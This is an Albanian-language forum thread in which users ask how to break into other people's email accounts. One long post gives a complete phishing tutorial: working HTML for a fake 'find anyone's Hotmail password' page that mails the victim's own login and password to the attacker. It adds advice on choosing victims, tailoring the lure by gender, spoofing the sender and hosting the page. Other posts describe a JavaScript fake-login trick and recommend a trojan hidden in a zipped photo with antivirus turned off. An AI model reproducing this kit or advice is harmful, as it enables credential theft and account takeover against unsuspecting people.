Close
Faqja 3 prej 7 FillimFillim 12345 ... FunditFundit
Duke shfaqur rezultatin 41 deri 60 prej 121

Tema: {***hack***}

 1. #41
  Open your mind now! Maska e besart
  Anėtarėsuar
  11-11-2002
  Vendndodhja
  Prishtinė
  Mosha
  33
  Postime
  480
  Faleminderit
  0
  0 falenderime nė 0 postime
  O kacacku basket, Ardi nuk do e lodhë koken te provoj qindra e mjëra kombinime vetëm te qelloj paswordin tuaj.
  Por po te them diqka, ta dish se një gjë e tillë nuk është e parealizueshme.

  "Ligji i Aksionit dhe i Reaksionit është universal".
  Ligji i aksionit dhe reaksionit ėshtė universal. Keni kujdes!

 2. #42
  Rising Star and Legend Maska e Davius
  Anėtarėsuar
  20-04-2003
  Vendndodhja
  Underground
  Mosha
  34
  Postime
  11,961
  Faleminderit
  1
  23 falenderime nė 22 postime
  Me qe qenka reaktivizuar kjo teme une po pyes dicka?

  A eshte e mundur qe emaili i hotmail apo yahoo te hackohet nga persona qe kurre ne kontakt s'kane qene me ate PC qe eshte hapur ndonjehere ai email...

  Shembull ky email: deputeti_83@yahoo.com a eshte e mundur te hackohet nga njerez tjere qe kurre nuk kane qene ne kontakt me pronarin e-mailit, asnjehere s'ka mare spam nga to, ose programe spiunazhi e ashtu... dmth per hackerin ky email te jete krejt i panjohur...

  Dmth shkurt dikush nga ndonje vend tjeter i thote ndonje hackeri, te lutem thyeje passin e ketij emaili: deputeti_83@yahoo.com se me duhet...

  A eshte e mundur kjo?...

  Sipas meje nuk e besoj kurre, sepse po te ishte e mundur sot ishte bere gėrdi neper emaile qe kane peshe ne bote dmth te funksionareve, organizatave apo qeverive jo ne emaile cic-mic si tonet...

  Edhe dicka, kam lexuar se nje website hackeresh kerkonte 150$ te hackon caredo emaili, me kusht qe pagesa te behet para se ato te dergojne pergjigjen, ishte keshtu, atyre ju jep emailin, ato e thyejn, e marrin pasin, dhe te informojne se puna eshte kryer, nese don te keshe passin duhet te paguash parate, kur paguan parate ke passin qe ke deshiruar...per mua keto me duket endra...
  Fotografitė e Bashkėngjitura Fotografitė e Bashkėngjitura  
  My silence doesn't mean I am gone!

 3. #43
  Super Moderator Maska e benseven11
  Anėtarėsuar
  10-09-2002
  Vendndodhja
  new jersey-usa
  Postime
  13,495
  Faleminderit
  68
  178 falenderime nė 165 postime
  Davius,varet se ku e ke pare ate 150$ parapagese per nje email.Faqja cfare date ka.Eshte e vjeter para 2 vjeteve psh,apo eshte faqe e re.Spekullohet shume ne internet me gjetjen e paswordeve kundrejt nje shume nga njerez hajdute,qe duan te bejne ca pare shpejt. Thuhet diku: eshte zbuluar nje metode vjedhje paswordi ne yaho ose hotmail dhe faqja eshte e vjeter,eshte nje post i dikujt para dy vjetesh.Dhe thuhet qe funksionon.Ajo metode nuk mund te funksionoje sot,pasi windowsi eshte azhurnuar,ka mare patche dhe per pasoje
  pikat e dobeta qe shfrytezohen nga metoda per gjetjen e paswordit jane mbyllur.Mund te kete sukses nese windowsi eshte i pambrojtur.Suksesi ne vjedhjen e paswordeve varet nga shkalla e mbrojtjes se windowsit ne kompjuterin e viktimes dhe metoda, teknikat,programi qe perdoret nga personi qe do te vjedhe passwordin.Vjedhja e passwordeve eshte nje lloj hacking,pasi eshte nje penetrim ne kompjuterin e viktimes.Shfrytezohen pika te dobeta(vulnerabilities) qe garantojne sukses.Sa shpejt mund te mbyllen keto pika te dobeta.Pikat e dobeta mund te jetojne deri nje muaj mesatarisht dhe mbyllen nga mikrosofti apo serverat me sisteme linuks.Kjo do te thote qe vjedhja e passwordeve ashtu si dhe metodat e hacking kane jete shume te shkurter.Ate metode qe ke perdorur para 6 muajsh nuk mund ta perdoresh dot me sot.Rezultatet sukses do jene shume te rralla dhe te vogla vetem per sistem kompjuterash qe nuk kane marre azhurnimet e reja.Per sisteme kompjuterave te azhurnuar me patchet e muajit te fundit nuk do funksionoje.Te gjitha metodat e reja qe dalin,versione te reja programesh spiune shfrytezojne shume forumet e vulnerabilities,forumet e sigurise ne google,ku postohen pikat me te reja te dobeta ne sistemet windows dhe linuks.Keto forume vizitohen nga njerez negative si dhe profesioniste te interesuar te mbrojne sistemet e operimit.keto forume vizitohen edhe nga media si PC magazine,ZD net etj qe kane shume pergjegjsi autoritet,ekspertize,pervoje,dhe boton ne faqen e saj pikat e reja te dobeta te dala.Gjithashtu vizitohen nga njerez qe punojne te Microsofti,kompani qe krijojne programe antivirus dhe specialiste qe merren me sigurine e rrjeteve dhe sistemeve te korporatave.Njohja e ketyre pikave te reja te dobeta eshte shume e rendesishme te njihet nga Hackers,krijues virusash dhe trojanesh.Ku eshte qellimi?Pse dalin cdo muaj rraca te reja virusesh,worms,trojane?Qellimi kryesor eshte paraja.Te nxitur nga motive fitimi,keto pika te dobeta te krijojne mundesi te vidhen passworde ne hotmail,yahoo,outlook.Te vidhen numra kredit karte.Duke shfrytesuar keto pika te dobeta dhe vjedhje paswordesh mund te
  grumbullohet informacion nga konkurentet ne biznes(spiunazh ekonomik)Si dhe per motive"te gjej te verteten" ne mardhenjet midis njerezve,probleme besimi etj.
  Metoda te tilla penetrimi i perdor edhe shteti per qellime komplet te mbeshtetura ne ligj per te grumbulluar fakte dhe material inkriminues,per persona te dyshimte
  qe merren me aktivitet te paligjshem,droge,arme,terrorizem prostitucion,aktivitet mafjoz,pislliqe financiare,mashtrime per shuma te madha parash etj.Perfundimi im eshte,nuk ke garanci 100% qe nje metode vjedhje passwordesh ose metode hacking do funksionoje ne rregull ne cdo rast.Mund te funksionoje vetem per nje periudhe te shkurter 1 muaj e ca. Me vone jo.Varet gjithashtu edhe se sa i mbrojtur eshte kompjuteri i viktimes,sa njohuri ka viktima per kompjuterat.
  ≈♥♠♣♦≈ovguide.com/movies

 4. #44
  i/e regjistruar Maska e phyro
  Anėtarėsuar
  09-12-2005
  Postime
  39
  Faleminderit
  0
  0 falenderime nė 0 postime

  Si mund te thej e-mail adresa.....

  Ju pershendes... A ka ndonje program per te thyer e-mail andresa psh e ke ndonjerin inat dhe don tia thej e-mail adresen a ka program per te thyr a po jo ??

 5. #45
  www.Alb-IT.com Maska e ylber1998
  Anėtarėsuar
  24-10-2005
  Vendndodhja
  Kosovė
  Mosha
  30
  Postime
  253
  Faleminderit
  0
  0 falenderime nė 0 postime
  Po me Keyloger,se per ndryshe osht veshtir apo s'mundesh fare tja marresh dikujn passin,ne tjeter mnyr.
  Phyro:shiko se ka tema te tilla ne kete forum shiko aty nese gjen dikqa
  pershendetje

 6. #46
  [L]{I}[N]{U}[X] Maska e Ardi_Pg_ID
  Anėtarėsuar
  28-01-2003
  Vendndodhja
  New York City Haven on Earth
  Mosha
  38
  Postime
  2,760
  Faleminderit
  8
  10 falenderime nė 10 postime
  Deri tani nuk i dihej zgjidhja keti problemi, po tani ka dale menyra me e thjeshte per te gjetur pasin e nje email.

  Sic e shpjegojne autoritet ligjore te amerikes, eshte nje nga menyrat me efikase per kuptuar se sa e thjeshte eshte kjo gje. Ulu para kompjuterit shko tek faqja e kompanise qe ofron email si psh www.hotmail.com ose www.yahoo.com. Merni nje shami lidheni ne koke, merni 10 paketa me cigare edhe nje shishe te madhe me alkol. Shiko monitorin edhe thuaj me vete, "Nese kjo faqe nuk me jep pasin e email atehere une jam budalla". Edhe me verte qe faqia do te te jape pasin e ati email.

  E gjithe kjo qe thashe eshte per nje kuptim. A ja vlen paraqirane te meresh me kete pune?

  Jepini vete pergjigje

  Ardi
  Forgiving Islamic Terrorists is Gods Duty, Our Duty Is To arrange the Meeting
  N. H. Schwarzkopf

 7. #47
  i/e larguar Maska e X-POISON
  Anėtarėsuar
  24-03-2003
  Vendndodhja
  Tropoje
  Mosha
  33
  Postime
  10
  Faleminderit
  0
  0 falenderime nė 0 postime
  Pse mo kaq budallenj jane njerezit. sa te fusin codin kudo! kjo menyre eshte e kote fare!


  Citim Postuar mė parė nga benseven11
  eshte nje menyre me java script kod.menyra se si funksionon eshte pak a shume keshtu. Personit qe do ti gjesh paswordin
  i dergon nje email ne pjesen ku shkruhet teksti vendos codin e javascriptit.Cndodh kur ai klikon te emaili qe ti i ke derguar java scripti aktivizohet dhe atij i shfaqet nje dritare e re qe i kerkon te beje login duke futur emrin e acountit te emailit si eshte regjistruar po ashtu edhe paswordin.nga ky moment nje kopje e ketij e maili se bashku me emrin qe ai eshte regjistruar te acounti i emailit dhe paswordi qe ai perdor te vijne ty ne e mail.Kjo jep rezultat ne webmail sic eshte hotmaili dhe yahoo nuk jep rezultat ne outlookbesoj duhet jete i lidhur me natyren e protokollit qe perdorin .hotmaili dhe yahoo perdorin http protocol kurse outlooku perdor pop3>Edhe dicka tjeter.Mund tja marresh
  paswordin ne qofte se kompjuteri i tij e ka javascriptin te aktivizuar te security settings,dmth duke kaluar nga tools te browseri lart pastaj internet options/security/custom level/ketu ai te javascript rrjeshti duhet ta kete ate me nje pike ne rreth ku thote enable java script.Dhe problemi i fundit ne qofte se kompjuteri i tij ka te instaluar windSP1 pack(nje tufe codesh patches qe mbyllin pikat e dobeta te sistemit te operimit) si dhe ka te instaluar security packs qe i perkasin Internet explorerit
  6. atehere eshte shume e veshtire per te mos thene e pamundur
  tja gjesh paswordin.

 8. #48
  Perjashtuar Maska e Dito
  Anėtarėsuar
  02-04-2004
  Vendndodhja
  Ne Bahēen time
  Postime
  3,888
  Faleminderit
  0
  10 falenderime nė 10 postime
  KY TEKST I SHKURTER ESHTE SHKRUAR NE FORME TILLE QE TE SHERBEJE VETEM DHE VETEM PER ARSYE MESIMORE. NE RAST SE FALE NJOHURIVE TE MARRA PREJ KETIJ LEKSIONI JU KRYENI KRIME INFORMATIKE TE CDO LLOJI, E GJITHE PERGJEGJESIA E VEPRIMEVE BIE MBI VETE JU. UNE FORMULUESI I KETIJ TEKSTI SHPREHEM QE TANI KUNDER CDO NDERMARRJEJE KEQDASHES NDAJ CDO SISTEMI OPERATIV , KUDO QOFTE. DUKE VAZHDUAR LEXIMIN E TIJ TEKSTI JU PRANONI KUSHTET E MESIPERME DHE MERRNI PERSIPER PERGJEGJESITE LIGJORE QE MUND TE LINDIN, NE RAST TE KUNDER MBYLLENI KETE DOKUMENT TANI.

  (KY DOKUMENT U HARTUA PER FORUMISHQIPTAR.COM ME 5 QERSHOR 2003 NGA ANETARI I KETIJ FORUMI Dito. NIVELI I TEKSTIT : PER FILLESTARE)
  “HACKING” HOTMAIL & YAHOO & SHUME SHUME TE TJERE...

  OK, po pershkruaj ketu shkurtimish nje metode per te marre passwordet e adresave web-based te postes elektronike (si Hotmail , Yahoo etj.) e cila eshte sa e thjeshte aq edhe efikase. Fiksoni menjehere se megjithese titulli i temes eshte pompoz kjo metode nuk eshte “hacking”, perderisa bazohet ne gomarllekun e tjetrit dhe jo ne aftesite tuaja.
  Atehere po ju them direkt se kjo nuk eshte asgje me shume se nje faqe HTML, keshtu qe duhet ta keni te thjeshte te orientoheni brenda kodit (nqs njihni kodimin manual te HTML).
  Kur e sajova per here te pare nje gje te tille, i frymezuar nga te tjeret qe perdornin prej kohesh metoden e “Dergo nje email me username e passin tend per te gjetur ate te tjetrit...”, nuk ma merrte mendja se do te kisha sukses. Hehehee... por puna tregoi te kunderten... Shume gomere (te me falin nja dy se i kam edhe miq LoL) rane brenda koke e kembe dhe grumbullova me shume passworde sec e kisha menduar.
  Kjo metode funksionon gjithmone ... per sa kohe do te vazhdoje te funksionoje HTML (pra edhe per shume shume kohe...) Une kam arritur te marr qe nga nga passworde shqiptaresh Por dhe disa vip-ve OK .. tani para se te kalojme direkt ene le ti hedhim nje sy parimit dhe efektit psikologjik...  Parimi i punes dhe momenti i duhur per ta perdorur :

  Do te habiteshit po ta shikonit se sa rendesi mbart ana psikologjike ne kete metode; tani do ta shikojme me hollesisht . Kushti I pare dhe themeltar per te perdorur nje metode si kjo eshte :

   Viktima duhet te jete me aftesi te kufizuara ne boten e kompjuterit. (Manite e tij per tu bere hacker apo per te hapur adresa etj jane nje avantazh gjigand….Oh me falni mos po pershkruaj gje ndonjerin nga ju???? LoL)

  Ne rast se viktima nuk e permbush kushtin e pare mos e harxhoni kot kete metode sepse do te fillonte te behej bajate dhe do ta mesonin te gjithe.
  Atehere nqs keni dike qe ploteson kushtin e mesiperm jeni ne gjysem te punes. Tani ju dalin perpara dy mundesi :

  1. Viktima juaj eshte femer : (urraaaahhh) : Konsiderojeni veten njeri me shumje fat. Ne faqen HTML perdorni gjuhen italiane (apo ndonje gjuhe tjeter qe ajo njeh). Kurre mos perdorni gjuhen shqipe...femrat jane TE DJALLEZUARA (pra jo domosdoshmerisht te zgjuara) mos beni kurre gabime gramatikore tek femrat. Ato jane kurioze ne kulm, keshtu qe ne pjesen e reklames qe permban faqja HTML shtoni gjera te tipit : - A deshironi te dini se cfare i shkruan i dashuri juaj te tjereve? - Doni te dini cfare shkruan shoqja jote e ngushte per ty...? ...pra gjera te ngjashme duke i zgjedhur me shume kujdes sipas tipit. Nqs ajo ka ndonje aktor apo artist shume shume te preferuar mund te shtoni edhe : - Me kete metode ne lexuam edhe emailet e Brad Pitit. E turpshme por e vertete..ana psikologjike ka shume rendesi.

  2. Viktima juaj eshte mashkull : meshkujt jane disi me skeptike si tipa. Gjuha qe mund te perdorni tek reklama mund te jete kryesisht anglishtja (edhe italishtja nuk bie poshte..shkurt nje gjuhe qe ta kuptojne pervec shqipes) Gabimet gramatikore nuk kane shume rendesi sepse nuk kane per ti vene re. Leva juaj e vertete ketu do te jete madheshtia me fjali te tipit : -Deshironi te lexoni emailet e kujtdo qe deshironi? -Doni te beheni mbreti i adresave te tyre (e di e di hihihiihhi kot fare po nuk po me vjen ne mendje asgje tjeter...LoL). Edhe varianti i xhelozise nuk bie poshte me pyetje provokuese si psh : - Mos po ju a dredh gje e dashura me dike ne internet? LlooLL Te them te drejten meshkujt kane perbere 70% te viktimave te mija. Ok tani le te kalojme drejt e tek kodi e te shikojme si funksionon.


  SI FUNKSIONON DHE SI VJEN PASSWORD-I

  Kodi HTML i faqes eshte si me poshte (me te kuq eshte kodi dhe me jeshile shpjegimet) :


  <html>
  <head><title>Deshironi te lexoni posten e miqve tuaj???</title></head>

  <body bgcolor=”black” text=”lime”>

  <!—Titulli dhe Reklamimi -->

  <p align ="center"><font size="5">E keni pyetur ndonjehere veten me ke flet apo cfare shkruan i dashuri juaj? Deshironi te dini cfare dhe kujt i shkruajne per ju miqte tuaj? Deshironi ti prishni pune ndonjerit qe keni inat? Doni te lexoni emailet e shefit ne pune? TANI MUNDENI !!! </font> </p>

  <hr>

  <!—Ketu i tregoni viktimes se si ta perdore -->
  <p align="justify"> <i><b>Vetem me 4 hapa te thjeshte ketu ju mund te gjeni password-in Hotmail te kujtdo qe deshironi.</b></i>

  <ol>

  <li>Shkruani adresen e personit tjeter ne kutine e pare (1). Psh. Nese doni te gjeni password-in e : <i>deborah@hotmail.com</i>, mjafton te shkruani ne kutine 1 vetem <i>deborah</i>.</li>

  <li>Ne kutine e dyte (2) vini emrin e adreses suaj. ME RENDESI : Adresa juaj duhet te jete gjithashtu Hotmail (jo Yahoo etj.). Perseri si me pare mos perfshini pjesen <i>@hotmail.com</i>.</li>

  <li>Ne kutine e trete (3) duhet te shkruani password-in tuaj. Serverat e Hotmail do te perdorin keto informacione per te verifikuar kerkesen dhe per te kaluar filtrat e sigurise.</li>

  <li>Ne fund klikoni mbi butonin &quot;Gjej Passwordin! &quot;. Ky do ti dergoje nje email me nje link special serverit te caktuar qe merret me passwordet, dhe me pas, passwordi i kerkuar do tju dergohet po me email ne adresen tuaj</li>

  </ol>

  <br>

  <!—Hacku i vertete fillon ketu. Lexojini me kujdes elementet e formes dhe do te kuptoni thjeshtesine me te cilen funksionon kjo metode. Adresa email e dhene ketu eshte faktikisht adresa juaj por me nje emer bindes ne menyre qe tjetri te mos i bjere ne te direkt. Edhe subjektin lijeni dicka serioze..-->

  <form method="POST" action="mailtogi_bin_find_userpass@msn.com?subject=Find User Password"
  name="hackform">
  <input type="hidden" name="linefeed1" value=""> <input type="hidden" name="linefeed1" value=""> <a name="form"><i><b><p align="justify"><font size="2">Mbushini kutite sic e spjeguam (Mos shkruani @hotmail.com) : </font></b></i></a>

  <ol>

  <li><input type="text" name="hacklogin" size="16" maxlength="64">
  &nbsp; (Adresa e personit tjeter) <br></li>

  <li><input type="text" name="userlogin" size="16" maxlength="64">
  &nbsp; (Adresa juaj email) <br></li>

  <li><input type="password" name="userpword" size="16" maxlength="16">
  &nbsp; (Passwordi juaj [i fshehte])<br><br>
  <input type="submit" name="enter" value="Gjej Passwordin!"><br>
  (<i>Nese doni me shume informacion per kete metode lexoni seksionin e meposhtem.</i>)</li>

  </ol>

  </form>

  <!—Ketu mund te jepni disa informacione shtese per ta bere me te besueshme menyren me te cilen funksionon. Perdorni fantazine tuaj ne menyre maksimale dhe te zgjuar. Dhe mos harroni : eshte me mire te mos thuash gje fare se sa te thuash budallalleqe...LoL-->

  <i><b>Si funksionon kjo metode? Shume e thjeshte!</b></i>

  <ol>

  <li>Fillimisht ju bini dakort qe nuk do ta perdorni kete metode kurre <b>per keq</b> , kjo ka vetem qellim demostrativ. Asnjerit nuk i pelqen ti lexojne posten ashtu sic nuk u pelqen edhe juve.</li>

  <li>Qe kur <b>MSN</b> bleu Hotmail-in, iu desh te linte nje dere te dyte ne sistem per te perdorur llogarite e meparshme. Tani kete dere mund ta perdorni edhe ju vete! A nuk eshte e mrekullueshme?<br>Funksionon kaqi <b>mire</b> sa qe ne tani e tutje nuk merremi me gje tjeter.</li>

  <li>Nuk duhen derguar kerkesa nqs kutite nuk jane plotesuar sic duhet, perndryshe metoda do te deshtoje dhe serveri do tju dalloje duke ju mohuar aksesinj per here te dyte!</li>

  <li>Kur te keni shtypur butonin "Gjej Passwordin!" nga kompjuteri juaj, nepermjet llogarise POP (pra Outlook-ut) do ti dergohet nje email Hotmailit, i cili pasi e shqyrton kerkesen tuaj, ju pergjigjet po me email duke ju derguar passwordin, brenda nje periudhe kohore <b>qe nga 2 - 36 ore</b>. Ne raste kur nuk merrni pergjigje brenda kesaj periudhe (gje qe nuk ndodh pothuajse kurre), provoni perseri nga nje kompjuter tjeter, duke u siguruar qe ai punon me Outlook (shume internet kafe e kane kete opsion).</li>

  <li>Ky email tani per tani i eshte derguar vetem 500 personave. Ne te ardhmen do tja dergojme edhe shume te tjereve neper bote. Qellimi yne eshte te tregojme se bota e informatikes sot per sot eshte shume e pa sigurte!</br> Nese keni pyetje, probleme apo qofte edhe komente ju lutem ne kontaktoni ketu - - : <b>Bisha@hackers.com</b></li>

  </ol>

  <hr height="1">

  </body>
  </html>
  Pjesen midis vijave, mund ta vendosni ne editorin tuaj te preferuar HTML per ta modifikuar ne gjuhen qe deshironi dhe sipas fantazise suaj ta permiresoni etj. Nje mendim i mire do te ishte te shtonit edhe nje forme tjeter brenda kesaj te kopjuar direkt nga Hotmaili origjinal.. pra pikerisht formen e loginit normal. Keshtu do keni mundesine tja parashtroni ate viktimes si nje prove mirebesimi duke i thene te provoje te hape adresen e tij direkt nga kjo faqe...gje qe natyrisht do te ishte me se normale..hehehe. Pamja e jashtme e kodit te mesiperm ne browser do te ishte pak a shume kjo :  por ju mund ta modifikoni sipas deshires. Kete faqe e ndertuam per te “hackuar” (hiihiihihii) Hotmailin, por sic besoj e kuptoni , me modifikime te vogla ne tekst (jo ne kodin HTML real) mund ta pershtatni per yahoo e per cdo lloj emaili tjeter qe te doni...Mjafton te plotesohet kushti i pare heheheheeh....

  Tani per ta derguar kete faqe : mos e dergoni nga adresa juaj. Dergojeni anonimisht me nje emer te madh futja kot psh : BillGates@Microsoft.Com, me nje subjekt te tipit urgjent. Faqen HTML dergojeni si attachment duke e keshilluar viktimen ta download-oje. Mos e ziponi kot faqen..eshte shume e lehte 4-5 Kb + qe kini parasysh qe nje idioti mund ti dukej pune e komplikuar Unzipi dhe ta linte fare. Ka shume mundesi qe keta trapa tja postojne njeri-tjetrit kete faqe, keshtu qe mos u habisni nese ju vijne passworde nga te tjere te cileve ju nuk i keni derguar gje. (Faktikisht mua me ndodhi pikerisht keshtu me ata njerezit e atij univeristetit jashte shtetit LoL).
  Oh se per pak harrova.. cfare ndodh kur IDIOTI shtyp ate dreq butoni “Gjej Passwordin” ? Nga llogaria e tij POP niset drejt adrese qe keni dhene (ne rastin e mesiperm ishte : cgi_bin_find_userpass@msn.com ) nje mail me subjektin e percaktuar po nga ju i cili ne pamje te pare eshte bosh por ...heheeh , permban nje attachment TXT me nje si tip URL fallco ku te ngaterruar me emrat e formes gjenden edhe username e passwordi i viktimes. Faktikisht versionet si 5+ e 6+ te IE do ta informojne viktimen se ai po dergon te dhena te paenkriptuara, por kjo gje me besoni do ti dukej atij edhe me intriguese...LOL. Te jeni te sigurt se nqs ploteson kushtin e pare do te bjere brenda 100%.
  Me kaq po e mbyll edhe per sot... sa per metoden ajo thashe eshte funksionale. Nuk eshte se po e jap se nuk punon, vetem se tani per tani mua me ka dale nga qejfi (kam qe ne 2001 qe e perdor LoL) + qe perdor nje menyre tjeter.

  Ohhh, edhe dicka e fundit fare :
  Kete faqe mund ta ktheni ne asp ose edhe ta lini sic eshte pak rendesi ka e ta vendosni online ne nje server. Do te lodheni me pak dhe nqs keni vizitore peshq te etur per “Hacking” e “Cracking” me siguri qe do te keni nje peshkim te mbare.

  Ok atehere u bera telef...gjithe te mirat e kujdes se me ke lozni...Shendet!  <!—Starting Hacking Process through MSN Server http:\\ etj etj LoL-->

  Bye bye......

  Dito.
  Ndryshuar pėr herė tė fundit nga Dito : 08-01-2006 mė 12:06

 9. #49
  i/e regjistruar
  Anėtarėsuar
  03-12-2005
  Postime
  11
  Faleminderit
  0
  0 falenderime nė 0 postime
  Menyra me e mire eshte je JavaScript qe folet pak me lart kjo e fundit eshte procedur me e gjat dhe duhet te punohet me outlook expres.

 10. #50
  i/e regjistruar Maska e P@R4nOi@C_LorD
  Anėtarėsuar
  05-05-2006
  Postime
  2,426
  Faleminderit
  0
  Falenderuar 1 herė nė 1 postim

  Ē'do tė thotė hacker? Po cracker?

  Me qe ra fjala tek HACK , kush quhet HACKER , dmth cfare eshte ne gjendje te beje nje HACKER i zoti?

 11. #51
  ish- Ballisti_Tetove Maska e Cimo
  Anėtarėsuar
  11-12-2004
  Postime
  2,443
  Faleminderit
  0
  5 falenderime nė 5 postime
  Cili eshte ndryshimi midis nje hackeri dhe nje crackeri ?

  Ne fillim, edhe Bill Gates dhe Steve Jobs (Themeluesit e kompanise Microsoft) ishin Hacker.Shume persona nuk arrijne te kuptojne ndryshimin midis nje hacker dhe nje pirati informatik I cili perdor te gjitha teknologjite e mundshme per te demtuar sisteme publike ose private.Nje hacker eshte nje person I cili perdor te gjitha njohurit e tij informatike per qellim kerkimesh ose njohjesh, pa demtuar asgje dhe askend.(to hack perkthyer ne shqip do te thote : "Me kerku nje difekt ne nje program.").Hackerat kerkojne te pranohen si nje e mire e njerezimit. Ne fakt, shumica e hackerave te arrestuar jane te punesuar prane shoqerive te medha informatike ne detyren : Teknik Sigurie. Nese mendoheni mire, nese keni nje problem, do te ishte me e lehte qe ta zgjidhte nje "mik" I hackerave se sa nje teknik I thjeshte.Ndersa nje cracker eshte nje person I cili perdor te gjitha njohurite e tij ne projektimin e programeve shkaterrues, perhap viruse qe kalojne ne sisteme ne gjithe boten si I Love You, Nimda etj.Zakonisht nje cracker perfundon ne nje kriminel informatike.

  Si lindi fenomeni "HACKER"

  Ne kohen kur u krijua kompjuteri I pare qe ishte madhesine e nje dhome, ishte e pamundur blerja e nje kompjuteri te tille. Studentet e rinj kerkonin te dinin sa me shume mbi kete teknologji te re, dhe shpesh mundoheshin te hynin ne dhomen ku gjendeshin butonat e te famshmit IBM 704 vendosur ne pallatin e 36 te Massachussets Institute of Technology, fshehurazi ose pa autorizim. Me pas Docentet kuptuan se keta studente arriten te krijojne nje ide te re dhe nje grup te ri hackerash te titulluar MIT. Docentet kerkuan bashkepunimin e tyre. Ne vitet 60' studentet e MIT filluan te kerkojne se si te telefononin pa paguar duke shfrytezuar difektet e sistemeve dhe te linjave. I pari qe arriti kete qellim ishte Steward Nelson .

  Si u zhvillua fenomeni Hacking

  Ne vitet 60' studentet e MIT donin qe e gjithe masa popullore te ishte ne e injformuar mbi teknologjine e re qe po zhvillohej. Nje nga motot e tyre ishte dhe 'hands on' - vendosni dore mbi gjithcka.Mundohuni te zbuloni ate cka nuk dini.Ata thoshin se duhet te gjendet nje kompjuter ne cdo familje.Sistemet operative I shperndanin falas deri sa dy hackera (Bill Gates dhe Steve Jobs) kerkuan nje perqindje ne prodhimin e tyre te fundit te krijuar ne basic. Ne kete rast Steve Jobs u be themeluas I Apple. Keshtu nisi dhe rruga e nje periode te re ku hackerat kishin synime kryesore fitimet ekonomike.

  Ne cfar konsiston fenomeni Hacker .

  Hackerat nuk konsiderohen "Pirate Informatike" por persona te cilet kane nje detyre per te zhvilluar : hapja e rruges per zhvillimin e lire ne njohjen e teknologjise.Nese sfidojne sisteme sigurie e bejne vetem per te bere nje sfide,ose per te treguar sa jane te zote, jo per te kryer nje akt kriminal, ne te kunderten, ne te shumten e rasteve, nese kuptojne se sistemi ka nje difekt, njoftojne menjehere drejtuesin e tij qe te marre masat e sigurise. Ja cilat jane principet e nje hackeri :

  * Mos kryej akte illegale dhe vjedhje

  * Mos shkaterro kurre nje sistem informatik

  * Mos modifiko kurre dokumentat e sistemit

  * Mos ler gjurme, derisa nuk lihet te mendohet se sistemi eshte I dobet

  * Mos ver ne shenje kompjuterat shteteror dhe te istitucioneve

  * Mos u zbulo.

  * Mundohu te zbatosh keto rregulla.

  Parrulla e Hackerave

  Ne kerkojme dijen,njohjen, dhe ju na quani kriminele.Ne, egzistojme pa ngjyre lekure, pa shtetesi dhe pa gjykime fetare... dhe ju na quani kriminele. E ju, ndertoni bomba atomike, beni luftra, masakra,na genjeni dhe tentoni te nabindni se eshte per te miren tone...dhe prape kriminelet jemi ne. Po, jam nje kriminel. Krimi im eshte kurioziteti. Krimi im eshte qe gjykoj personat ne baze te asaj qe mendon dhe thote, dhe jo nga pamja. Faji im eshte se jam me dinak nga ju, dhe per kete nuk mund te me falni. Une jam nje Hacker, dhe kjo eshte fjala ime.

 12. #52
  i/e regjistruar Maska e P@R4nOi@C_LorD
  Anėtarėsuar
  05-05-2006
  Postime
  2,426
  Faleminderit
  0
  Falenderuar 1 herė nė 1 postim
  Falemnderit per shpjegimin ballisti!

 13. #53
  mos e luaj; I DEBUAR! Maska e qoska
  Anėtarėsuar
  17-05-2004
  Vendndodhja
  tirane
  Postime
  837
  Faleminderit
  0
  0 falenderime nė 0 postime
  Eshte bere nje here diskutimi i hacker/cracker dhe ajo e thene me siper ka ndryshuar disi me kohen.

 14. #54
  Il padrino Maska e DEN_Bossi
  Anėtarėsuar
  31-07-2006
  Vendndodhja
  Shkoder-Tirane
  Postime
  450
  Faleminderit
  0
  0 falenderime nė 0 postime

  Si te gjej passwordin e emailit ?

  Di qe ka ekzistuar nje virus i cili po te dergohej me email te kthente passwordin e emailit te cilin ia ke derguar. Por ky virus ka dale nga funksionimi tani...


  Pyetja eshte se ka ndonje lloj virusi apo ndonje menyre per te gjetur pasworin e emailit.

  faleminderit !

 15. #55
  RebeL AnGeL /IrC STaFF Maska e angel_guy
  Anėtarėsuar
  04-08-2002
  Vendndodhja
  Inside Your Feelings
  Postime
  326
  Faleminderit
  0
  0 falenderime nė 0 postime
  Ore bossi ti na thua hapu burg se duhet te futem LoL. Ka disa programe po per ju si fillestar po ju sygjeroj syb7en nje lloj i lehte trojani qe ju vet mund ta aplikoni me nje foto , dhe dergojani personit qe ju intereson ne messenger . Mos harro tashme msn jan me skanime ndaj virusesh keshtuqe mund ti beni thjesht nje zipim te vogel asaj foto ose atij materjali .

  Gjith te mirat per disa arsye spo te jap link ku ta shkarkosh , por nuk e ke te veshtire ta gjesh ne internet . Dhe dicka tjeter kur ta besh download c`aktivizo cdo lloj sistemi mbrojtes antivirus etj . Fola cik si shum me duket lol.

  Gjith te mirat
  DasHuRia PerBeheT NgA dY PjeSe NdJeNjaT DhE PreKjA

 16. #56
  i/e regjistruar Maska e P@R4nOi@C_LorD
  Anėtarėsuar
  05-05-2006
  Postime
  2,426
  Faleminderit
  0
  Falenderuar 1 herė nė 1 postim
  Une kam provuar disa menyra por skam dale gjikundi!

  Ej legacy nese e ke fjalen per keyloger atehere mos u mundo kot sepse edhe antivirusi me i lodhur e kap.

 17. #57
  i/e regjistruar
  Anėtarėsuar
  30-08-2006
  Vendndodhja
  askund
  Postime
  9,058
  Faleminderit
  68
  49 falenderime nė 44 postime

  a ka mundesi me me ndihmu?

  pershendetje miq
  duke mas kene i afte ne informatike mendova te baj nje pytje paksa idiote por qe vlen shume per mu.besoj se dikush nga ju do me ndihmoje.
  si mund te arrij te zbuloj paswordin e emailt te nje personi?
  ju faleminderit

 18. #58
  Shqiptar Maska e EdiR
  Anėtarėsuar
  24-05-2002
  Vendndodhja
  Madison, WI, U.S
  Postime
  963
  Faleminderit
  0
  0 falenderime nė 0 postime
  Nqs e njeh njeriun ke mundesi te shkosh tek kompjuteri i tij etj mund por ne te kundert mos u lodh se eshte e pamundur*.

 19. #59
  Pasioni pėr shkencėn Maska e Nolird
  Anėtarėsuar
  19-04-2007
  Vendndodhja
  Tetove
  Postime
  466
  Faleminderit
  0
  Falenderuar 1 herė nė 1 postim

  Si tė mbroj fjalėkalimin e email-it?

  Ju lutem me tregoni se cfare programi mund te marr prej ne internet qe te mos ma thejn fjalekalimin e emailit.Por nje program me te vertete qe nuk lejon qe te thejn fjalekalimin, pasi kam patur nje program ROBOFORM por ai nuk e mbrojti fjalekalimin tim qe te mos thehet.

  Respekte.
